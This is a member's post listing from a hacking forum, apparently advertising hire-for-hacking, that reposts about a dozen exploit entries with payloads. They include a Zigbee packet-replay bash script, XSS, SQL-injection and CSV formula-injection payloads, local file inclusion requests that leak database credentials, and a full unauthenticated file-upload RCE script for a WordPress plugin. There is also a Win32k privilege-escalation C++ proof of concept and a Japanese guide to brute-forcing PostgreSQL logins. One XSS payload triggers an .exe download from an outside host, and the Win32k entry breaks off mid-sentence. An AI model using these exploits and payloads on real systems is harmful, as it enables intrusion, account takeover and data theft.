Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Ksix Zigbee Devices - Playback Protection Bypass (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Ksix Zigbee Devices - Playback Protection Bypass (PoC) # Date: 2020-11-15 # Exploit Author: Alejandro Vazquez Vazquez # Vendor Homepage: https://www.ksixmobile.com/ # Firmware Version: (Gateway Zigbee Module - v1.0.3, Gateway Main Module - v1.1.2, Door Sensor - v1.0.7, PIR Motion Sensor - v1.0.12) # Tested on: Kali Linux 2020.3 # The coordinator of the Zigbee network (Zigbee gateway) does not correctly check the sequence number of the packets that are sent to it, which allows forging messages from an end device to the coordinator (example: turn on a light bulb, open a door, ...) by injecting a very large value in the "sequence number" field. # To exploit this vulnerability # 1. Capture Zigbee traffic with a sniffer (Api-Mote) and save it in .pcap format # 2. Open the file with Wireshark and locate the packet you want to forward (turn on a light bulb, open a door, ...) # 3. Copy that packet as "hex dump" and save it to a .txt file # 4. Modify the "sequence number" field to a high value such as 250 # 5. Convert the txt file to .pcap again # 6. Forward the packet to the network, using a tool such as Killerbee #!/bin/bash function usage(){ echo -e "\nUsage: $0 [ZigbeeChannel] [SecuenceNumber] [HexDumpFile] [ShortSource] [ExtendedSource] [ShortDestination] [ShortPanId] [FCS]" echo -e "Example: $0 11 250 Open_Door_Alert_Hex_Dump 0x0001 11:ff:11:ff:11:ff:11:ff 0x0000 0x3333 0x0000 \n" echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n" } function message(){ echo -e "\nProof of Concept" echo -e "There is an incorrect check of the \"sequence number\" field on Ksix Zigbee devices\n" echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n" } function poc_playback(){ # Variables ZIGBEE_CHANNEL=$1 SECUENCE_NUMBER=$2 HEX_DUMP_FILE=$3 SHORT_SOURCE=$4 EXTENDED_SOURCE=$5 SHORT_DESTINATION=$6 SHORT_PAN_DESTINATION=$7 FRAME_CHECK_SECUENCE=$8 declare -a first_line_array declare -a second_line_array declare -a last_line_array # Change packet fields while IFS= read -r line do if [[ "$line" == "0000"* ]]; then IFS=' ' read -ra first_line_array <<< "$line" first_line_array[0]+=" " first_line_array[3]=$( printf "%x" $SECUENCE_NUMBER ) first_line_array[4]=${SHORT_PAN_DESTINATION:4:2} first_line_array[5]=${SHORT_PAN_DESTINATION:2:2} first_line_array[6]=${SHORT_DESTINATION:4:2}; first_line_array[11]=${SHORT_DESTINATION:4:2} first_line_array[7]=${SHORT_DESTINATION:2:2}; first_line_array[12]=${SHORT_DESTINATION:2:2} first_line_array[8]=${SHORT_SOURCE:4:2}; first_line_array[13]=${SHORT_SOURCE:4:2} first_line_array[9]=${SHORT_SOURCE:2:2}; first_line_array[14]=${SHORT_SOURCE:2:2} echo "${first_line_array[@]}" > Check_Secuence_Number_Incorrectly_HEX_Dump elif [[ "$line" == "0010"* ]]; then IFS=' ' read -ra second_line_array <<< "$line" second_line_array[0]+=" " second_line_array[7]=${EXTENDED_SOURCE:21:2}; second_line_array[8]=${EXTENDED_SOURCE:18:2} second_line_array[9]=${EXTENDED_SOURCE:15:2}; second_line_array[10]=${EXTENDED_SOURCE:12:2} second_line_array[11]=${EXTENDED_SOURCE:9:2}; second_line_array[12]=${EXTENDED_SOURCE:6:2} second_line_array[13]=${EXTENDED_SOURCE:3:2}; second_line_array[14]=${EXTENDED_SOURCE:0:2} echo "${second_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump elif [[ "$line" == "0030"* ]]; then IFS=' ' read -ra last_line_array <<< "$line" last_line_array[0]+=" " last_line_array[11]=${FRAME_CHECK_SECUENCE:4:2} last_line_array[12]=${FRAME_CHECK_SECUENCE:2:2} echo "${last_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump else echo "$line" >> Check_Secuence_Number_Incorrectly_HEX_Dump fi done < $HEX_DUMP_FILE # Hex Dump file to pcap text2pcap Check_Secuence_Number_Incorrectly_HEX_Dump Check_Secuence_Number_Incorrectly.pcap # Playback zbreplay --channel $ZIGBEE_CHANNEL --pcapfile Check_Secuence_Number_Incorrectly.pcap && echo -e "\nPacket sent to the network. Poc Completed.\n" } function main(){ if [ $# -lt 8 ]; then echo -e "\n\t Missing arguments" usage exit else message poc_playback $1 $2 $3 $4 $5 $6 $7 $8 fi } main $1 $2 $3 $4 $5 $6 $7 $8 #NOTE: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message "Door open".
  2. HireHackking

    DotCMS 20.11 - Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: DotCMS 20.11 - Stored Cross-Site Scripting # Exploit Author: Hardik Solanki # Vendor Homepage: https://dotcms.com/ # Version: 20.11 # Tested on Windows 10 Vulnerable Parameters: Template Title Steps to reproduce: 1. Login With Admin Username and password. 2. Navigate to Site --> Template --> Add Template Designer 2. Entre the payload <script>alert(document.cookie)</script> in Template Title. 3. Now Navigate to Site --> Template. We could see that our payload gets executed. And hence it executed every time.
  3. HireHackking

    WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass # Date: 18-11-2020 # Exploit Author: Aakash Madaan # Vendor Homepage: https://webdamn.com/ # Software Link : https://webdamn.com/user-management-system-with-php-mysql/ # Version: N/A (Default) # Tested on: Windows 10 professional Steps to reproduce: 1. Open user login page using following URl: -> http://localhost/login.php <http://localhost/login.html> 2. If attacker get access to valid email address ( leaked data or by any other means) then he/she can use the email address as follows: Payload: <email>' OR '1'='1 NOTE: Use the above payload in both username and password fields 3. Server accepts the payload and the attacker is able to bypass the user login panel with only email address.
  4. HireHackking

    ChurchCRM 4.2.0 - CSV/Formula Injection

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: ChurchCRM 4.2.1- CSV/Formula Injection #Date: 2020- 10- 24 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://churchcrm.io/ #Software Link: https://github.com/ChurchCRM/CRM #Version: 4.2.0 #Payload: =10+20+cmd|' /C calc'!A0 #Tested on: Kali Linux 2020.3 #Proof Of Concept: CSV Injection (aka Excel Macro Injection or Formula Injection) exists in List Event Types feature in ChurchCRM v4.2.0 via Name field that is mistreated while exporting to a CSV file. To exploit this vulnerability: 1. Login to the application, goto 'Events' module and then "List Event Types" 2. Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the 'Name' field 3. Now goto 'List Event types' module and click CSV to download the CSV file 4. Open the CSV file, allow all popups and our payload is executed (calculator is opened).
  5. HireHackking

    ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS) #Date: 2020- 10- 29 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://churchcrm.io/ #Software Link: https://github.com/ChurchCRM/CRM #Version: 4.2.1 #Tested on: Kali Linux 2020.3 #Proof Of Concept: ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability: 1. Login to the application, go to 'View all Deposits' module. 2. Add the payload ( <script>var link = document.createElement('a'); link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'; link.download = ''; document.body.appendChild(link); link.click(); </script> ) in the 'Deposit Comment' field and click "Add New Deposit". 3. Payload is executed and a .exe file is downloaded.
  6. HireHackking

    Simple College Website 1.0 - 'page' Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple College Website 1.0 - 'page' Local File Inclusion # Date: 30-10-2020 # Exploit Author: mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip # Version: 1.0 # Tested on: Parrot 5.5.17 + version: Apache/2.4.46 (Debian) # CVE ID : N/A # Local File Inclusion #parameter Vulnerable: page #Request GET /college_website/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=7ls9j695lglc2eah5khecv2g66 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 #Response HTTP/1.1 200 OK Date: Sat, 31 Oct 2020 02:49:31 GMT Server: Apache/2.4.46 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 15674 Connection: close Content-Type: text/html; charset=UTF-8 <main class=""> PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjb2xsZWdlX3dlYnNpdGVfZGInKW9yIGRpZSgiQ291bGQgbm90IGNvbm5lY3QgdG8gbXlzcWwiLm15c3FsaV9lcnJvcigkY29uKSk7DQo= </main>
  7. HireHackking

    Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality #Date: 2020-11-11 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://www.anuko.com/ #Software Link: https://www.anuko.com/time-tracker/index.htm #Version: 1.19.23.5311 #Tested on: Kali Linux 2020.3 #CVE: CVE-2020-27423 #Proof Of Concept: Anuko Time Tracker v1.19.23.5311 and prior, lacks rate limit on the password reset module which allows attackers to perform Denial of Service attack on any legitimate user's mailbox. Attacker could perform Denial of Service on a legitimate user's mailbox To exploit this vulnerability: 1. Goto 'Password Reset' module and enter any user's login name 2. Click on 'Reset Password' and capture this request. 3. Replay this request n number of times. 4. The victim receives a password reset email the number of times the request is replayed.
  8. HireHackking

    Mitel mitel-cs018 - Call Data Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure # Date: 2003-07-28 # Exploit Author: Andrea Intilangelo (acme olografix / paranoici) # Vendor Homepage: www.mitel.com # Version: mitel-cs018 # Tested on: Windows, Linux There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this: Trying 192.168.1.2... Connected to 192.168.1.2. Escape character is '^]'. Username: mitel-cs018 Password: ERROR: Invalid Username/Password pair Username: Password: Username: ^X^W^E^Q^W Password: ERROR: Invalid Username/Password pair Username: Password: ERROR: Invalid Username/Password pair # in this moment a foreign call arrive from outside Username: 155 OGIN 149 11:11:55 D 2 156 ICIN 11:12: 6 D 4 0xxxXxxxxx 157 XFIC 156 11:12: 6 151 0: 9:47 D 3 158 ICIN 11:12: 6 D 3 0xxxXxxxxx 159 ANSW 146 11:12:11 0: 0: 9 D 4 160 HDIN 146 11:12:21 D 4 162 HREC 146 11:12:27 0: 0: 6 D 4 163 ABND ? 11:12:37 0: 0:37 D 3 0xxxXxxxxx 164 ICIN 11:12:43 D 3 0xxxXxxxxx 165 EXIC 146 11:12:54 0: 0:47 D 4 166 ANSW 146 11:13: 0 0: 0:16 D 3 167 HDIN 146 11:13: 6 D 3 169 EXIC 146 11:13:13 156 0: 0:12 D 3 171 EXOG 149 11:13:46 0: 1:59 D 2 0xxXxxxxx 172 XFIC 156 11:16:53 146 0: 3:40 D 3 # where "0xxXxxxxx" are telephone numbers A derives table results is: SEQ CODE EXT ACC TIME RX TX DURATION LN DIALLED DIGITS COST No. No. COD HH:MM:SS FROM TO HH:MM:SS No. ___ _____ ____ ____ ________ ____ ____ ____________ ______________ _______
  9. HireHackking

    Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Anuko Time Tracker 1.19.23.5311 - Password Reset Vulnerability leading to Account Takeover #Date: 2020-11-11 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://www.anuko.com/ #Software Link: https://www.anuko.com/time-tracker/index.htm #Version: 1.19.23.5311 #Tested on: Kali Linux 2020.3 #CVE: CVE-2020-27422 #Proof Of Concept: In Anuko Time Tracker v1.19.23.5311 and prior, the password reset link emailed to the user doesn't expire once used, hence the attacker could use the same link to take over the victim's account. An Attacker needs to have the link for successful exploitation. A malicious user could use the same password reset link of the victim multiple times to take over the account. To exploit this vulnerability: 1. Goto 'Password Reset' module and enter any user's login name 2. Reset the password using the password reset link received in the email 3. Use the same link again after resetting the password once 4. Password is changed again using the previously used link.
  10. HireHackking

    Car Rental Management System 1.0 - SQL Injection / Local File include

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include # Date: 22-10-2020 # Exploit Author: Mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: parrot + Apache/2.4.46 (Debian) SQL Injection #Vulnerable Page: http://localhost/carRental/index.php?page=view_car&id=4 #POC 1: http://localhost/carRental/index.php?page=view_car&id=-4+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10+from+users-- LFI #Vulnerable Page1: http://localhost/carRental/index.php?page=about #Vulnerable Page2:http://localhost/carRental/admin/index.php?page=movement #POC 1: http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home #POC 2:http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect note POC 2 reading database information #example : curl -s -i POST http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect | grep view-panel -A 1 #result <main id="view-panel" > PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjYXJfcmVudGFsX2RiJylvciBkaWUoIkNvdWxkIG5vdCBjb25uZWN0IHRvIG15c3FsIi5teXNxbGlfZXJyb3IoJGNvbikpOw0K #proof of concept picture https://ibb.co/8Dd7d9G
  11. HireHackking

    WordPress Plugin Wp-FileManager 6.8 - RCE

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE # Date: September 4,2020 # Exploit Author: Mansoor R (@time4ster) # CVE: CVE-2020-25213 # Version Affected: 6.0 to 6.8 # Vendor URL: https://wordpress.org/plugins/wp-file-manager/ # Patch: Upgrade to wp-file-manager 6.9 (or above) # Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip) on Ubuntu 18.04 #!/bin/bash #Description: #The core of the issue began with the File Manager plugin renaming the extension on the elFinder library’s connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to be used “as-is” without adding access controls, and this file had no direct access restrictions, meaning the file could be accessed by anyone. This file could be used to initiate an elFinder command and was hooked to the elFinderConnector.class.php file #Using connector.minimal.php file attacker can upload arbitrary file to the target (unauthenticated) & thus can achieve Remote code Execution. #Patch commit details: # https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2373068%40wp-file-manager%2Ftrunk&old=2372895%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail= #Reference #https://nvd.nist.gov/vuln/detail/CVE-2020-25213 #Credits: #1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/ #2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/ ##WARNINGS: #Only test the exploit on websites you are authorized to. #Don't upload reverse shell payloads or any files that can cause harm to organization. #Also note that the uploaded files can be accessed by anyone unless secured by password. ## Usage: # ======== # root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress --check # # ============================================================================================ # wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213] # # By: Mansoor R (@time4ster) # ============================================================================================ # # [+] Found wp-file-manager version: 6.0 # [+] Version appears to be vulnerable # [+] Target: http://192.168.1.54/wordpress is vulnerable # # root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress -f /tmp/mypoc.php --verbose # # ============================================================================================ # wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213] # # By: Mansoor R (@time4ster) # ============================================================================================ # # curl POC : # curl -ks --max-time 5 --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@//tmp/mypoc.php" "http://192.168.1.54/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" # # [+] W00t! W00t! File uploaded successfully. # Location: /wordpress/wp-content/plugins/wp-file-manager/lib/php/../files/mypoc.php # Exploit #========== echo echo "============================================================================================" echo "wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]" echo echo "By: Mansoor R (@time4ster)" echo "============================================================================================" echo function printHelp() { echo -e " Usage: -u|--wp_url <string> Wordpress target url -f|--upload_file <string> Absolute location of local file to upload on the target. (relative path will not work) -k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded. -v|--verbose Also prints curl command which is going to be executed -h|--help Print Help menu Example: ./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check ./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose " } check="false" verbose="false" #Processing arguments while [[ "$#" -gt 0 ]] do key="$1" case "$key" in -u|--wp_url) wp_url="$2" shift shift # past argument ;; -f|--upload_file) upload_file="$2" shift shift ;; -k|--check) check="true" shift shift ;; -v|--verbose) verbose="true" shift ;; -h|--help) printHelp exit shift ;; *) echo [-] Enter valid options exit ;; esac done [[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL." && exit [[ -z "$upload_file" ]] && [[ "$check" == "false" ]] && echo "[-] Either supply --upload_file or --check" && exit [[ -n "$upload_file" ]] && [[ ! -s "$upload_file" ]] && echo "[-] File supplied is either empty or not exist." && exit #Script have dependency on jq jq_cmd=$(command -v jq) [[ -z "$jq_cmd" ]] && echo -e "[-] Script have dependency on jq. Insall jq from your package manager.\nFor debian based distro install using command: apt install jq" && exit function checkWPFileManagerVersion() { #Takes 1 argument: url declare url="$1" declare target_endpoint="$url/wp-content/plugins/wp-file-manager/readme.txt" declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" declare is_vulnerable="true" #declare response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i "Stable tag: ") declare version=$( curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -A 5 "== Changelog ==" | grep -E -o "[0-9]\.[0-9]" | head -n 1 ) if [ -n "$version" ];then #declare version=$(echo "$response" | awk {'print $3'}) echo "[+] Found wp-file-manager version: $version" patched_version="6.9" #if [ $(awk 'BEGIN {print ('$version' > '6.9'}') ]; then smaller_version=$(echo -e "$version\n$patched_version" | sort -n | head -n 1) if [ "$version" != "$patched_version" ] && [ "$smaller_version" == "$version" ];then echo "[+] Version appears to be vulnerable" else echo "[-] Version don't appears to be vulnerable" is_vulnerable=false fi else echo "[-] Unable to detect version. May be wp-file-manager plugin not installed." is_vulnerable=false fi if [ "$is_vulnerable" == "false" ]; then echo -n "Do you still want to continue (y/N) : " read choice [[ "$choice" == "y" ]] || [[ "$choice" == "Y" ]] && echo && return exit fi } function checkWPFileManager() { #Takes 1 argument: url declare url="$1" #Checking wp-file-manager plugin version: checkWPFileManagerVersion "$url" declare target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" declare response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint") #echo "$response" #{"error":["errUnknownCmd"]} is returned when vulnerable endpoint is hit declare is_vulnerable=$(echo "$response" | grep "\{\"error\":\[\"errUnknownCmd\"\]\}") [[ -n "$is_vulnerable" ]] && echo "[+] Target: $url is vulnerable" [[ -z "$is_vulnerable" ]] && echo "[-] Target: $url is not vulnerable" } function exploitWPFileManager() { #Takes 3 arguments: url & file_upload & verbose(true/false) declare url="$1" declare file_upload="$2" declare verbose="$3" declare target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" if [ "$verbose" == "true" ];then echo "curl POC :" echo "curl -ks --max-time 5 --user-agent \"$user_agent\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"$target_endpoint\" " echo fi response=$(curl -ks --max-time 5 --user-agent "$user_agent" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" \ -F "upload[]=@/$file_upload" \ "$target_endpoint" ) #echo "$response" file_upload_url=$(echo "$response" | jq -r .added[0].url 2>/dev/null) [[ -n "$file_upload_url" ]] && echo -e "[+] W00t! W00t! File uploaded successfully.\nLocation: $file_upload_url " [[ -z "$file_upload_url" ]] && echo "[-] File upload failed." } [[ "$check" == "true" ]] && checkWPFileManager "$wp_url" [[ -s "$upload_file" ]] && exploitWPFileManager "$wp_url" "$upload_file" "$verbose" echo
  12. HireHackking

    タイトル:gressql postgrsqlログインを割った6つの方法

    HireHackking posted a blog entry in Hacker Technology
    最初の方法Hydra: Hydraは通常、Telnet、Postgres、HTTP、HTTPS、SMBサービス、さまざまなデータベースを含む50を超えるプロトコルに対して高速辞書のブルートフォース攻撃を実行できます。これで、辞書ライブラリを選択する必要があります。他の辞書パスワード攻撃と同様に、辞書が重要です。 Kaliの下には、同様のパスワード辞書ライブラリがたくさんあります。 次のコマンドを実行します。 Hydra –l/root/desktop/user.txt –p/root/desktop/pass.txt 192.168.1.120 postgresパラメーター:L:ユーザー名辞書ライブラリ(CAPS)のパスを表します-P:パスワードディクショナリーライブラリ(CAPS)のパスのパスを表します。見たように、以下は、Postgresユーザー名がPostgresユーザー名としてPostgresとしてパスワードとして正常に取得されていることを示しています。 2番目の方法xhydra: これは、ポート5432を介してパスワード辞書攻撃を通じてクラックされるPostgresデータベースシステムのグラフィカルバージョンです。この方法を使用するには、kaliシステムで最初にxhydraを開いて、「シングルターゲット」を選択してからターゲットホストに記入します。プロトコルでPSTGRESプロトコルを選択し、ポートで5432を選択します。 次に、[ユーザー名]タブに移動し、[ユーザー名]リストを選択し、下のボックスにユーザー名を使用して辞書ファイルへのパスを入力します。次に、「パスワードリスト」を選択し、テキストファイルの下のボックスに辞書パスワードを入力します。 これを行ったら、[開始]タブに移動し、左側の[スタート]ボタンをクリックします。これで、パスワード辞書攻撃のプロセスが開始されます。したがって、正しいユーザー名とパスワードが取得されます。 3番目の方法メデューサ: Medusaは、高速で大規模な同時、モジュール式のログイン爆発アーティファクトであることを目指しています。 AFP、CVS、POSTGRES、HTTP、IMAP、RLOGIN、SSH、Subversion、VNCなどの多くのプロトコルをサポートしています。 次のコマンドを実行します:Medusa -H192.168.1.120 -U /Root/desktop/user.txt-p /root/desktop/pass.txt -mpostgresパラメーター:-u:ユーザー名辞書ライブラリ-p:パスワードdictionaryライブラリへのパスは、パスワードのように、パスワードとしてのパスワードを取得します。 4番目の方法ncrack: NCRACKは、高速ネットワーク認証クラッキングツールです。これは、企業がパスワードについてすべてのホストとネットワークデバイスを積極的にテストすることにより、脅威からネットワークを保護するのに役立つように設計されています。 次のコマンドを実行します。 ncrack-v -u /root/desktop/user.txt-p /root/desktop/pass.txt 192.168.1.120:5432パラメーター: U:ユーザー名リストを表すパス-P:パスワードリストを表すパスが表示されているように、ポストグレスとしてのユーザー名とpostgresとしてパスワードを正常に取得しました。 5番目の方法パテーター: Patatorは、モジュラー設計を採用し、柔軟性のある使用可能な多機能バーストツールです。 Postgres、HTTP、SMBなどの複数のプロトコルポートでのブルートフォース攻撃に非常に役立ちます。 コマンドは次のとおりです。PGSQL_LOGINHOST=192.168.1.120ユーザー=file0 0=/root/desktop/user.txtパスワード=file1 1=/root/desktop/pass.txt 以下に示すスクリーンショットから、パスワード辞書攻撃のプロセスを確認できるため、正しいユーザー名とパスワードが取得されます。 6番目の方法メタプロイト: このモジュールは、3つのパラメーターオプションuser_file、pass_file、userpass_fileで示されるユーザー名とパスワードの組み合わせを使用して、postgreSQLインスタンスを認証しようとします。パスワードは、プレーンテキストまたはMD5形式のハッシュにすることができることに注意してください。 kali端子を開き、コマンドを入力します。MSFConsoleはモジュールを使用するようになりました。 MSF Exploit(scanner/postgres/postgres_login)rhosts 192.168.1.120(リモートホストのIP) MSF Exploit(scanner/postgres/postgres_login)set user_file /root/desktop/user.txtmsf exploit(scanner/postgres/postgres_login)set userpass_file/root/desktop/pass.txtmsf exploit(scanner/setgris_login truemsf exploit(scanner/postgres/postgres_login)以下のスクリーンショットからエクスプロイトすると、Postgresのユーザー名とパスワードが正常に取得されていることがわかります。 wiz_tmp_tag id='wiz-table-range-border' contentedable='false' style='display: none;'
  13. HireHackking

    Microsoft Windows - Win32k Elevation of Privilege

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microsoft Windows - Win32k Elevation of Privilege # Author: nu11secur1ty # Date: 08.03.2020 # Exploit Date: 01/14/2020 # Vendor: Microsoft # Software Link: https://support.microsoft.com/en-us/help/3095649/win32k-sys-update-in-windows-october-2015 # Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/raw/master/Undefined/CVE-2020-0624/win32k/__32-win32k.sys5.1.2600.1330.zip # CVE: CVE-2020-0642 [+] Credits: Ventsislav Varbanovski (nu11secur1ty) [+] Source: readme from GitHUB [Exploit Program Code] // cve-2020-0624.cpp #pragma warning(disable: 4005) #pragma warning(disable: 4054) #pragma warning(disable: 4152) #pragma warning(disable: 4201) #include <Windows.h> #include "ntos.h" typedef NTSTATUS(NTAPI* PFNUSER32CALLBACK)(PVOID); HWND hParent{}, hChild{}; BOOL Flag1{}, Flag2{}; PFNUSER32CALLBACK OrgCCI2{}, OrgCCI3{}; NTSTATUS NTAPI NewCCI2(PVOID Param) { if (Flag1) { Flag1 = FALSE; Flag2 = TRUE; DestroyWindow(hParent); } return OrgCCI2(Param); } NTSTATUS NTAPI NewCCI3(PVOID Param) { if (Flag2) { ExitThread(0); } return OrgCCI3(Param); } int main() { DWORD OldProtect{}; PTEB teb = NtCurrentTeb(); PPEB peb = teb->ProcessEnvironmentBlock; PVOID pCCI2 = &((PVOID*)peb->KernelCallbackTable)[2]; if (!VirtualProtect(pCCI2, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect)) return 0; OrgCCI2 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI2, &NewCCI2); PVOID pCCI3 = &((PVOID*)peb->KernelCallbackTable)[3]; if (!VirtualProtect(pCCI3, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect)) return 0; OrgCCI3 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI3, &NewCCI3); hParent = CreateWindow(L"ScrollBar", L"Parent", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, NULL, NULL, NULL); hChild = CreateWindow(L"ScrollBar", L"Child", WS_OVERLAPPEDWINDOW | WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, 0, NULL, NULL); Flag1 = TRUE; SendMessage(hChild, WM_LBUTTONDOWN, 0, 0); return 0; } [Vendor] Microsoft [Vulnerability Type] Privilege Escalation [Description] The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE. - - - more: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642 [Disclosure Timeline] An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the 